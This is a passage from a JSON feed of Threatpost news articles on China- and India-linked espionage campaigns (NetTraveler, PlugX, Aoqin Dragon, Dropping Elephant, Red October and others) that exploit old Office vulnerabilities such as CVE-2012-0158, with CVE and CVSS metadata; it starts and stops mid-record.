campaign](<https://threatpost.com/anti-tibetan-attack-stems-nvidia-abuse-old-rtf-vulnerability-022713/'s+Most+Popular>).\n\nWhile the vulnerability has been used in the past against Tibetan activists and other Asian military and energy targets, the way the attack leverages an authentic Nvidia tool is interesting.\n\nThe RTF document in this case is an article about the Tibetan Youth Congress that acts as a diversion while three files are dropped onto the system: Nv.exe, NvSmartMax.dll and NvSmartMax.dll.url. Nv.exe is a legitimate executable for Nvidia\u2019s Smart Maximise Helper Host, a tool that helps manage properties for the company\u2019s graphics cards. The DLL file is the malicious part of the equation here though, executing encrypted code in NvSmartMax.dll.url that ultimately compromises the computer and grants the attacker the following remote access functionality:\n\n\n\nThe whole campaign is awfully similar to one [used by the remote access tool PlugX, spotted by TrendMicro last September](<http://blog.trendmicro.com/trendlabs-security-intelligence/unplugging-plugx-capabilities/>). That attack relied on a different, older Microsoft RTF vulnerability (CVE-2010-3333) but also dropped a handful of Nvidia files, including NvSmartMax.dll, onto systems. Much like the most recent attack, in the 2012 attack NvSmartMax.dll boots up a backdoor (boot.ldr) that that can open and modify files on the infected system.\n\nSophos has a more detailed explanation of the attack, including its multi step process at [Naked Security](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>).\n", "cvss3": {}, "published": "2013-02-27T19:10:44", "type": "threatpost", "title": "Anti-Tibetan Attack Stems from Nvidia Abuse, Old RTF Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-04-17T16:30:37", "id": "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF", "href": "https://threatpost.com/anti-tibetan-attack-stems-nvidia-abuse-old-rtf-vulnerability-022713/77570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:15", "description": "When NetTravler was unveiled in June, Costin Raiu of Kaspersky Lab warned that the espionage campaign was an \u201cugly gorilla with a thousand faces\u201d and that we hadn\u2019t seen them all yet.\n\nA little more than two months later, another profile of the malware targeting activists, diplomats, government targets and the scientific research community, has reared its head.\n\nRaiu said today that a variant has been spotted by Kaspersky\u2019s Global Research and Analysis Team and unlike its first go-round which targeted Microsoft Office vulnerabilities, this new take on [NetTraveler exploits a recently patched Java bug](<http://www.securelist.com/en/blog/208214039/NetTraveler_Is_Back_The_Red_Star_APT_Returns_With_New_Tricks>). The group behind the attacks has also jumped on the [watering hole attack](<http://threatpost.com/the-chinese-are-not-going-to-stop/100735>) bandwagon, having compromised an Uyghur-related website and redirecting victims to an attack site.\n\n\u201cWatering hole attacks have become another popular method to attack unsuspecting victims by the APT operators,\u201d Raiu wrote on Securelist, the Kaspersky Lab research blog. \u201cThere is perhaps no surprise that the NetTraveler attacks are now using this method as well.\u201d\n\nNetTraveler has zeroed in on Tibetan and Uyghur activists in addition to a number of manufacturing, research and even military targets. The first version, which [spread via spear phishing emails and dropped Office documents carrying malicious attachments](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>), exfiltrated files from victims\u2019 machines and send them to a command and control infrastructure that overlapped with one used by the Gh0st RAT campaign. Office document files such as Word, Excel and PowerPoint files were uploaded to command and control servers; the malware\u2019s configuration files can also be modified to steal design documents such as those done on Corel Draw or AutoCAD files. To date, NetTraveler has infected victims in more than 40 countries, Raiu said.\n\nThe variant reported today also targets the same victim demographics, but has expanded [beyond spear phishing](<http://threatpost.com/nettraveler-attackers-using-nsa-prism-program-as-bait/101006>) to [watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/77647>), which provide attackers with the ability to cast a wider net at potential victims by infecting websites they\u2019re likely to visit with exploits that redirect them to an attacker-controlled site where more malware awaits.\n\nThe updated NetTraveler was spotted in the last week, Raiu said, targeting several Uyghur activists with an email promising a statement from the World Uyghur Congress on a massacre in the Karghiliq country. The link to the statement spoofs the Uyghur Congress website, and instead points victims to a NetTraveler domain weststock[.]org. A Java exploit called new.jar on the page is for a [vulnerability patched in June by Oracle](<http://threatpost.com/oracle-java-patch-update-pushes-2013-totals-past-last-year/101014>), [CVE-2013-2465](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465>), that affects Java 7U21 and earlier, Java 6U45 and earlier and Java 5U45 and earlier. The payload is a backdoor dropper called file.temp used by NetTraveler, compiled on May 30, Raiu said.\n\nOnce up and running on the victim\u2019s machine, the NetTraveler variant connects to a command and control server hosted at Multacom Corp., in Los Angeles; the IP address is 198[.]211[.]18[.]93. Raiu said that the command server is still operational and that the server exclusively hosts the attack server.\n\nMeanwhile, the NetTraveler group has also apparently compromised a Uyghur-related website at the Islamic Association of Eastern Turkistan with an iframe attack that redirects victims to the weststock[.]org domain.\n\n\u201cThe usage of the Java exploit for CVE-2013-2465 coupled with the watering hole attacks is a new, previously unseen development for the NetTraveler group,\u201d Raiu said. \u201cIt obviously has a higher success rate than mailing CVE-2012-0158 exploit-ridden documents, which was the favorite attack vector until now. We estimate that more recent exploits will be integrated and used against the group\u2019s targets.\u201d\n\nNeither NetTraveler iteration relied on zero days, Raiu said. The [first version of NetTraveler](<https://www.securelist.com/en/blog/8105>) targeted Office vulnerabilities that had been patched almost a year, yet still Kaspersky Lab researchers were able to find more than 22 gigabytes of stolen data on sinkholed command and control servers\u2014a small fraction of the stolen data. More than 30 command and control servers have been discovered between the two versions of the campaign.\n", "cvss3": {}, "published": "2013-09-03T09:32:29", "type": "threatpost", "title": "NetTraveler Now Using Java Exploits, Watering Hole Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2013-2465"], "modified": "2013-09-04T21:31:57", "id": "THREATPOST:6E1A424ADE6EAAA732FBE0027DD6F97F", "href": "https://threatpost.com/nettraveler-variant-adds-java-exploits-watering-hole-attacks-to-bag-of-tricks/102156/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-06-17T13:34:15", "description": "Researchers have identified a small yet potent China-linked APT that has flown under the radar for nearly a decade running campaigns against government, education and telecommunication organizations in Southeast Asia and Australia.\n\nResearchers [from SentinelLabs said](<https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/>) the APT, which they dubbed Aoqin Dragon, has been operating since at least 2013. The APT is \u201ca small Chinese-speaking team with potential association to [an APT called] UNC94,\u201d they reported.\n\nResearchers say one of the tactics and techniques of Aoqin Dragon include using pornographic themed malicious documents as bait to entice victims to download them.\n\n\u201cAoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,\u201d researchers wrote.\n\n## **Aoqin Dragon\u2019s Evolving Stealth Tactics**\n\nPart of what\u2019s helped Aoqin Dragon stay under the radar for so long is that they\u2019ve evolved. For example, the means the APT used to infect target computers has evolved.\n\nIn their first few years of operation, Aoqin Dragon relied on exploiting old vulnerabilities \u2013 specifically, CVE-2012-0158 and CVE-2010-3333 \u2013 which their targets might not have yet patched.\n\nLater, Aoqin Dragon created executable files with desktop icons that made them appear to look like Windows folders or antivirus software. These programs were actually malicious droppers which planted backdoors and then established connections back to the attackers\u2019 command-and-control (C2) servers.\n\nSince 2018, the group has been utilizing a fake removable device as their infection vector. When a user clicks to open what seems to be a removable device folder, they in fact initiate a chain reaction which downloads a backdoor and C2 connection to their machine. Not only that, the malware copies itself to any actual removable devices connected to the host machine, in order to continue its spread beyond the host and, hopefully, into the target\u2019s broader network.\n\nThe group has employed other techniques to stay off-the-radar. They\u2019ve used DNS tunneling \u2013 manipulating the internet\u2019s domain name system to sneak data past firewalls. One backdoor leverage \u2013 known as Mongall \u2013 encrypts communication data between host and C2 server. Over time, the researchers said, the APT began slowly working the fake removable disc technique. This was done to \u201d pgraded the malware to protect it from being detected and removed by security products.\u201d\n\n## **Nation-State Links**\n\nTargets have tended to fall in just a few buckets \u2013 government, education and telecoms, all in and around Southeast Asia. Researchers assert \u201cthe targeting of Aoqin Dragon closely aligns with the Chinese government\u2019s political interests.\u201d\n\nFurther evidence of China influence includes a debug log found by researchers that contains simplified Chinese characters.\n\nMost important of all, the researchers highlighted an overlapping attack on the president of Myanmar\u2019s website back in 2014. In that case, police traced the hackers\u2019 command-and-control and mail servers to Beijing. Aoqin Dragon\u2019s two primary backdoors \u201chave overlapping C2 infrastructure,\u201d with that case, \u201cand most of the C2 servers can be attributed to Chinese-speaking users.\u201d\n\nStill, \u201cproperly identifying and tracking State and State Sponsored threat actors can be challenging,\u201d Mike Parkin, senior technical engineer at Vulcan Cyber, wrote in a statement. \u201cSentinelOne releasing the information now on an APT group that has apparently been active for almost a decade, and doesn\u2019t appear in other lists, shows how hard it can be \u2018to be sure\u2019 when you\u2019re identifying a new threat actor.\u201d\n", "cvss3": {}, "published": "2022-06-17T13:34:04", "type": "threatpost", "title": "China-linked APT Flew Under Radar for Decade", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2022-06-17T13:34:04", "id": "THREATPOST:794EAB73A376A35B810DFA241137B6D2", "href": "https://threatpost.com/apt-flew-under-radar-decade/179995/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-10T12:13:24", "description": "In these days of advanced threats, the perimeter defense strategy \u2013 though still useful and necessary \u2013 is incomplete. IT security teams need as much information about existing threats as possible, so they know what to look for and how to position proactive countermeasures. Creating and using adversary playbooks that dive-deep into current threats help in this endeavor.\n\nRather than focusing on the perimeter mindset of keeping the bad actors out, this new strategy focuses on preventing threat actors from achieving their goals. With this in mind, let\u2019s look at three such playbooks.\n\n## Silence Group Playbook\n\nA cybercriminal organization that targets banks, Silence Group has been actively focused on stealing information used in the payment-card industry since 2016. The group\u2019s aim is to make as much money as possible by compromising targets via a spear-phishing strategy, that then leads to exfiltrating financial data, as well as allowing attackers to [\u201cjackpot\u201d ATMs](<https://threatpost.com/atm-jackpotting-malware-winpot/141960/>) to withdraw money.\n\nThe Silence Group repurposes publicly available tools, combined with \u201cliving off the land\u201d techniques [i.e., trusted off-the-shelf and preinstalled system tools to carry out their work]. This strategy has two benefits: Using locally available tools helps them better evade detection, as authorized devices with pre-existing privilege helps them establish a deeper and stronger foothold in targeted systems. In addition, the group also writes its own sets of modular, custom tools.\n\nThe standard threat begins with a spear-phishing email containing malicious attachments. These may be in the form of a weaponized Microsoft Word document or a Microsoft-compiled html help (CHM) file sent to banks to entice their employees to click on the attachments.\n\nNext, a hidden VBS file is executed within the context of a browser window inside the help files, where it then de-obfuscates itself and executes a PowerShell command. This new PowerShell command calls out to another server to retrieve a binary file, which it then decrypts into a third-stage downloader. This last downloader then acquires the actual Silence Group payload that consists of several different modules, depending on which phase of the overall attack the group is currently in. These modules include a proxy, a monitoring agent, an ATM module and the actual main Silence module itself.\n\nThe ATM module is used in combination with human \u201cmules\u201d who use codes provided to their mobile devices to jackpot ATM devices \u2013 and then they physically transport cash to a drop-off site.\n\n## Goblin Panda Playbook\n\nFocused on interests in Southeast Asia, Goblin Panda has been active since 2014. Due to non-standardized naming conventions within the industry, Goblin Panda is also known as APT 27, Hellsing, Cycledek, and perhaps 1937CN. Its targets and campaigns have been quite specific in nature. Favorite methodologies of Goblin Panda include the use of remote access trojans, including the infamous PlugX/Korplug, NewCore, and Sisfader RAT tools.\n\nThe distribution of infected samples through weaponized Microsoft Office documents is a strategy often used by attackers such as Goblin Panda. Recent examples include documents containing malicious macros, or that exploit known vulnerabilities\u2014most recently [CVE-2012-0158](<https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/>) and [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>).\n\nTypically, Goblin Panda activity begins with a spearphishing attacks via a maliciously crafted Microsoft Office document. When the document is opened by the victim, a variety of files are dropped into different locations of the victim\u2019s PC. Dropped files include legitimate software vendor files, an encrypted binary blog containing the payload, and DLL files containing a decryptor and loader for the payload.\n\nThe attack also uses a DLL hijacking technique to evade traditional antivirus detections during the installation of the malware. This involves hijacking a variety of legitimate DLL files from different vendors using a trojanized version of a malicious DLL file. Finally, it also checks to determine if it is running in a VM environment. Once it is finished with those tasks, it sends various parameters to a C2 server. If those parameters are deemed okay, it then downloads a payload. In most recent cases, that payload has been the NewCore RAT malicious DLL file.\n\n## Playbook Preview: Zegost\n\nAn infostealer originating in China that has been active since 2011, Zegost is also known as Zusy or Kris. Zegost has recently undergone a variety of upgrades, including the ability to use specific Powershell actions to download its infostealer payload the moment a victim\u2019s mouse moves over a specific piece of text.\n\nIt has also added the ability to clear its own event logs to provide long-term evasion capabilities, granting it more time to move laterally across the victim\u2019s network. A previous update went so far as to enable it to use COM programming, an uncommon feature in malware.\n\nZegost\u2019s main objective is to amass information about the victim\u2019s device and exfiltrate it. Zegost will hunt for OS versions, analyze the speed and quantity of processors in the victim\u2019s machine, check for an internet connection and look for the RDP port number.\n\nZegost is uniquely configured among infostealers to remain under the radar, making it far more of a long-term threat compared to its contemporaries. The malware accomplishes this by evading runtime conflicts; it creates a mutex, which it checks to ensure only a single version of itself is running.\n\nZegost is currently deployed as the foundation of a spear-phishing campaign against a Chinese governmental entity. The motives for this campaign are currently unclear. While Zegost hosting infrastructure is based mainly in China, third-level domains for the infostealer have been observed outside of the country.\n\n## Going by the Book\n\nThreat actors are a determined and innovative lot, creating schemes within schemes to get what they want. Attackers only have to be right once however \u2013 while IT security teams are charged with covering all possible attack vectors. That\u2019s why adversary playbooks can be tremendously helpful for defensive learning.\n\nIn addition, they can play a critical role for law enforcement in identifying trends and strategies and fingerprinting common practices used by specific cybercriminal organizations. Deep analysis of threat techniques can be used to construct effective defenses. As more vendors share what they have learned with the larger industry, and create trusted partnerships even between competitors, as is the case with the [Cyber Threat Alliance](<https://www.cyberthreatalliance.org/>), everyone benefits as a whole.\n\n**_Derek Manky is chief of Security Insights & Global Threat Alliances at Fortinet \u2013 Office of CISO_**\n\n**_Please check out all of the latest posts in our [Infosec Insider Community](<https://threatpost.com/microsite/infosec-insiders-community/>)._**\n", "cvss3": {}, "published": "2019-08-28T14:47:51", "type": "threatpost", "title": "Defense Takeaways from Three Adversary Playbooks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882"], "modified": "2019-08-28T14:47:51", "id": "THREATPOST:E068C231265847BA99669A8EBF0D395D", "href": "https://threatpost.com/defense-takeaways-three-adversary-playbooks/147771/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:04", "description": "Don\u2019t judge an APT by its exploits alone. That\u2019s the takeaway from a report that details a unique advanced persistent threat that leverages a kludge of unsophisticated, outdated and rudimentary attack tools to conduct cyber espionage. The target of the attacks are government and diplomatic agencies in Asia with close ties to China.\n\nResearchers discovered the APT group, dubbed [Dropping Elephant](<https://securelist.com/blog/research/75328/the-dropping-elephant-actor/>), and report that it was active between November 2015 and this June. The APT, discovered by researchers at Kaspersky Lab and outlined in a report released today, relies exclusively on social engineering and low-budget malware tools and outdated exploits against old, patched Windows vulnerabilities.\n\nThe group, according to the report, chooses targets mainly in Asia, paying particular attention to Chinese government and diplomatic organizations \u2013 and also to foreign embassies and diplomatic offices in China, including those of Pakistan, Sri-Lanka, Uruguay, Bangladesh, Taiwan, Australia and USA, according to the report.\n\n\u201cDespite using such simple and affordable tools and exploits, the team seems capable of retrieving valuable intelligence information,\u201d said Vitaly Kamluk, director of Kaspersky Lab\u2019s APAC Global Research and Analysis Team.\n\nThe Dropping Elephant\u2019s ragtag approach included standard attack schemes starting with two-stage phishing email attack. Phase one involves sending email with a harmless attachment that when opened pinged the attacker\u2019s command and control server with details pertaining to the target\u2019s computer. The second stage included sending an email with either Microsoft Word or PowerPoint document that contained exploits (CVE-2012-0158 and CVE-2014-6352) effective on unpatched versions of Microsoft Office.\n\nIn other cases, according to Kaspersky Lab, the APT attacker also relied heavily on social engineering to reach desired targets. \u201cSome victims are targeted by a watering hole attack: they receive a link to a website disguised as a political news portal, focused on China\u2019s external affairs,\u201d according to Kaspersky Lab. Links lead to additional content that included Microsoft PowerPoint files that contained malicious payloads.\n\n\u201cThe content of the malicious PPS is based on carefully chosen, genuine news articles featuring widely discussed geopolitical topics, which makes the document look more trustworthy and likely to be opened. This leads many users to become infected,\u201d according to Kaspersky Lab.\n\nOnce the payloads are executed attackers place a UPX (a free and open source executable packer) with an AutoIT executable on targeted systems, according to Kaspersky Lab. The AutoIT then automates the downloads of additional components from the attackers\u2019 servers. \u201cThen the stealing of documents and data begins,\u201d Kaspersky Lab wrote in its report.\n\nA closer look at the Dropping Elephant APT\u2019s use of the AutoIT executable revealed an AutoIT3 script embedded inside. \u201cOnce started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user\u2019s Google Chrome credentials,\u201d according to the report.\n\nAnother file-stealer module, for example, downloaded malware that repeatedly attempted to go through directories and collect files (doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, and pdf) and then upload them to the command and control server.\n\nAccording to researchers, Dropping Elephant managed to pull off attacks with what Kaspersky Lab calls \u201clow investment and ready-made offensive toolsets\u201d that when coupled with high-quality social engineering lures. Social engineering also included maintaining Google+, Facebook and Twitter accounts.\n\nResearchers can\u2019t with 100 percent certainty say the attackers were of Indian origin. However, there are indicators such as the APT attackers used the Indian language, were active during Indian workday and IP addresses used in the attack were traced to India.\n\nKaspersky Lab said it doesn\u2019t believe that the cyber-espionage attacks will end anytime soon. Researchers say there are indications that the APT group is increasing its headcount, based on the fact active hours of the group have expanded.\n\n\u201cThe modus operandi of \u2018Dropping Elephant\u2019 could hardly be called sophisticated. The attackers rely heavily on social engineering and low-budget malware tools and exploits. However, this approach seems to be effective, which makes this actor a dangerous one,\u201d Kaspersky Lab wrote.\n", "cvss3": {}, "published": "2016-07-08T11:04:30", "type": "threatpost", "title": "'Dropping Elephant' APT Attackers Targets Old Windows Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2014-6352"], "modified": "2016-07-08T15:04:30", "id": "THREATPOST:4F07A726C1A5FB6D0CE8EDF605517CA0", "href": "https://threatpost.com/dropping-elephant-apt-targets-old-windows-flaws/119123/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:42", "description": "A new cyberespionage malware campaign with ties to China going back to the Titan Rain and Gh0stNet attacks has been targeting diplomats, military contractors and government agencies in 40 countries.\n\nResearchers at Kaspersky Lab today unveiled details on [NetTraveler](<http://www.securelist.com/en/blog/8105/NetTraveler_is_Running_Red_Star_APT_Attacks_Compromise_High_Profile_Victims>), a data exfiltration tool, which has infected more than 350 high profile victims using primarily exploits targeting two patched Microsoft vulnerabilities. Costin Raiu, senior security researcher and head of the Global Research and Analysis Team, told attendees today at the 2013 Cybersecurity Forum in Washington, D.C., that one backdoor used in the NetTraveler campaign was probably written by the same developers responsible for Gh0st RAT. In fact, Raiu said, the same group of 50 or so developers could be behind a number of similar espionage attacks dating back close to a decade.\n\n\u201cThere is a very common misconception that all these attacks are separate. In reality all these operations are connected to each other,\u201d Raiu said. \u201cThe NetTraveler attacks are loosely connected with the Gh0stNet attacks, which are loosely connected with Titan Rain.\n\n\u201cThey\u2019re just one big ugly gorilla with a thousand faces and of course we haven\u2019t seen all of them yet,\u201d Raiu said.\n\nIn addition to diplomats and government targets, NetTraveler samples were found to be targeting Tibetan and Uyghur activists, oil production facilities, scientific research outfits, universities and private companies. The tool is capable of extracting system information, drop keylogging malware, steal Office documents such as Word, Excel and PowerPoint files, and its configuration can be modified if necessary to steal Corel Draw designs, AutoCAD files and other file types used in manufacturing and defense circles. The files are then compressed and encoded via custom protocols that resemble BASE64 code and sent to a command and control server via HTTP.\n\nThe attacker\u2019s IP operation ranges, the Kaspersky report said, overlap with that of a malware family known as Zegost, or the Gh0st remote access Trojan; one of the Zegost command and control servers was still active as of a few weeks ago. They\u2019re also used to distribute the Saker, a backdoor module used to steal system information that shares export functions via two DLLs named JustTempFun and ServiceMain. Those DLL names are also found in Gh0st RAT, the Kaspersky researchers said.\n\nSome of the victims targeted by NetTraveler, meanwhile, are also victims of Red October. However, Kaspersky has not connected the attackers in these two campaigns.\n\n\u201cAlthough we see no direct links between the NetTraveler attackers and the Red October threat actor, the existence of victims infected by both of these campaigns is interesting. These infections indicate that certain high profile victims are targeted by multiple threat actors; the target information is a valuable commodity,\u201d the report said, adding that the victims include a Russian military contractor, a Tajikistan government entity and embassy workers in Iran, Belguim, Kazakhstan and Belarus.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045233/nettraveler_03s.png>)\n\nThe attacks start with a spear phishing campaign targeting vulnerabilities described in [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>) and[ CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>). The messages and attached decoy documents vary according to the various targets and use a number of exploits that enable remote code execution and exploit of memory vulnerabilities in Office documents. Both have been patched, yet these attacks demonstrate the vulnerabilities are still reachable on some systems; no zero-days, rootkits or other advanced malware have been used in the NetTraveler campaign.\n\nKaspersky researchers found more than 22 gigabytes of stolen data on command and control servers they were able to sinkhole and analyze.\n\n\u201cHowever this data represents only a small fraction which we managed to see \u2013 the rest of the it had been previously downloaded and deleted from the C&C servers by the attackers,\u201d a report on the campaign said.\n\nKaspersky researchers said the command and control servers were running IIS 6 and 7 and a Microsoft ASP backend. The attackers transferred the stolen data from the command infrastructure using FTP through a VPN connection to a server in the U.S. hosted by Krypt Technologies. \u201cThe infrastructure is secured by allowing FTP access only to remote users coming from predefined IPs, including the VPN provider in the U.S.,\u201d the report said.\n\nIn all, more than 30 command and control servers are used in the NetTraveler campaign and all either collect stolen data or help with obfuscation of the attacks. NetTraveler is so named because of a string found in all early versions of the malware: \u201cNetTraveler Is Running!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045237/nettraveler_02.1s.png>)\n\nMost of the victims are diplomats, government agencies or military contractors, the report said. Combining data from the command and control servers and Kaspersky Security Network, almost 30 percent of infections happened in Mongolia, followed by Russia, India and Kazakhstan.\n\nKaspersky\u2019s GReAT team released a research report on NetTraveler, which includes indicators of compromise, that can be downloaded [here](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/22105852/kaspersky-the-net-traveler-part1-final-1.pdf>).\n", "cvss3": {}, "published": "2013-06-04T12:35:54", "type": "threatpost", "title": "NetTraveler Espionage Malware Campaign Ties to Gh0st RAT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2018-03-22T14:58:55", "id": "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "href": "https://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Existing in some form since 2008, the popular remote access tool PlugX has as notorious a history as any malware, but according to researchers the tool saw a spike of popularity in 2014 and is the go-to malware for many adversary groups.\n\nMany attacks, especially those occurring during the latter half of the year, were seen using the tool. In fact, researchers are theorizing the further proliferation of PlugX, which enables attackers to log keystrokes, modify and copy files, capture screenshots, as well as the ability to quit processes, log users off, and completely reboot users\u2019 machines, could suggest eventual worldwide adoption.\n\nThe malware was the most used variant when it came to targeted activity in 2014 according to Crowdstrike\u2019s [Global Threat Report](<http://www.crowdstrike.com/2014-global-threat-report/>), released today. Despite kicking around for years, the malware is now the de facto tool for dozens of China-based adversarial groups the firm tracks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/02/07005745/plugx.jpg>)\n\nOne of the ways the malware improved itself in 2014, and in turn caught on, was by switching up the way it communicates with its infrastructure further up the chain. By implementing a newer DNS command and control module, the malware has been able to send its data in the form of long DNS queries to its overseeing infrastructure.\n\n> Surge in PlugX infections could foreshadow future worldwide use via @Threatpost\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fplugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever%2F110936%2F&text=Surge+in+PlugX+infections+could%C2%A0foreshadow%C2%A0future+worldwide+use+via+%40Threatpost>)\n\nBy modifying the way the DNS and HTTP requests are produced, something Crowdstrike is calling a deviation from \u201csome of the more typically monitored protocols,\u201d it\u2019s made it more difficult to be detected over the past year or so.\n\n\u201cThe upward trend in use of PlugX indicates an increasing confidence in the capabilities of the platform, justifying its continued use across multiple sectors and countries,\u201d according to the report.\n\nOne of the groups that Crowdstrike caught dropping PlugX on machines was a hacking collective it calls Hurricane Panda, who used the malware\u2019s custom DNS feature to spoof four DNS servers, including popular domains such as Pinterest.com, Adobe.com, and Github.com. Instead of their legitimate IP addresses, the malware was able to instead point these domains to a PlugX C+C node.\n\nThe malware, as has been the case in the past, is commonly delivered via a spear phishing attack. Some of attacks go on to leverage a zero day from last March, CVE-2014-1761, which exploits vulnerable Microsoft RTF or Word documents. Others, meanwhile, make use of well-worn holes like CVE-2012-0158 in PowerPoint and Excel, that were also used by the [IceFog](<http://securelist.com/blog/incidents/58209/the-icefog-apt-hits-us-targets-with-java-backdoor/>), [Red October](<http://securelist.com/analysis/publications/36740/red-october-diplomatic-cyber-attacks-investigation/>), and [Cloud Atlas](<http://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/>) attacks.\n\nWhile some of the groups using PlugX have gone out of their way to register new domains for leveraging the malware\u2019s C+C, many domains from the last several years remain active, something else that Crowdstrike has attributed to the malware\u2019s success and persistence over the years.\n\nThe firm has two schools of thought when it comes to rationalizing how the malware has become so commonplace. It\u2019s thought that there\u2019s either a central malware dissemination channel that\u2019s pushing PlugX out to adversary groups or that groups that hadn\u2019t used PlugX in the past have recently been able to get copies of it via public repositories or the cybercrime underground. Either way, while the malware is mostly used by attackers from \u201ccountries surrounding China\u2019s sphere of influence,\u201d the report suggests that that trend could change soon enough. The malware has been used in recurring attacks against commercial entities in the U.S., and in other politically fueled attacks, but its rapid deployment \u201ccould be a precursor to future worldwide use,\u201d according Crowdstrike.\n\n\u201cThe ongoing development of PlugX provides attackers with a flexible capability that requires continued vigilance on the part of network defenders in order to detect it reliably.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:34", "type": "threatpost", "title": "Researchers: PlugX More Prominent Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2014-1761"], "modified": "2015-02-10T14:19:16", "id": "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "href": "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "description": "[](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>)For five years, it hid in the weeds of networks used by Eastern European diplomats, government employees and scientific research organizations, stealing data and infecting more machines in an espionage campaign rivaling Flame and others of its ilk. The campaign, called Rocra or Red October by researchers at Kaspersky Lab, focused not only on workstations, but mobile devices and networking gear to gain a foothold inside strategic organizations. Once inside, attackers pivoted internally and stole everything from files on desktops, smartphones and FTP servers, to email databases using exploits developed in China and Russian malware, Kaspersky researchers said.\n\nWhile Kaspersky would not go so far as to call it a nation-state campaign, the resources behind the attackers and the targets they chose\u2014which also included oil and gas companies, aerospace, nuclear research, and trade and commerce organizations\u2014would indicate an interest in a particular type of information.\n\nMost of the victims were specific organizations in Eastern Europe, former USSR nations and countries in Central Asia. Some attacks were also noticed in Western Europe and North America, Kaspersky said.\n\n\u201cThe campaign is currently still active with data being sent to multiple command-and-control servers through an infrastructure which rivals the complexity of the Flame malware,\u201d Kaspersky said in a [report released today](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>).\n\nKaspersky said it was alerted of the Rocra attacks by a partner last October when it began its analysis of the campaign. Several hundred infections worldwide have been counted. Three exploits have been used in the attack, all of which Kaspersky said were developed in China; the malware modules dropped in the attacks were created by Russian-speaking operatives, Kaspersky concluded.\n\n\u201cCurrently, there is no evidence linking this with a nation-state sponsored attack. The information stolen by the attackers is obviously of the highest level and includes geopolitical data which can be used by nation states,\u201d the report said. \u201cSuch information could be traded in the underground and sold to the highest bidder, which can be of course, anywhere.\u201d\n\nLike most of these APT-style targeted attacks, this one begins with a spear phishing message; one example provided was an announcement of a diplomatic car for sale.The email messages contain one of three attachments, each a different exploit of an existing vulnerability. One targets [CVE-2009-3120](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3120>) using a malicious Microsoft Excel document, while the other two are 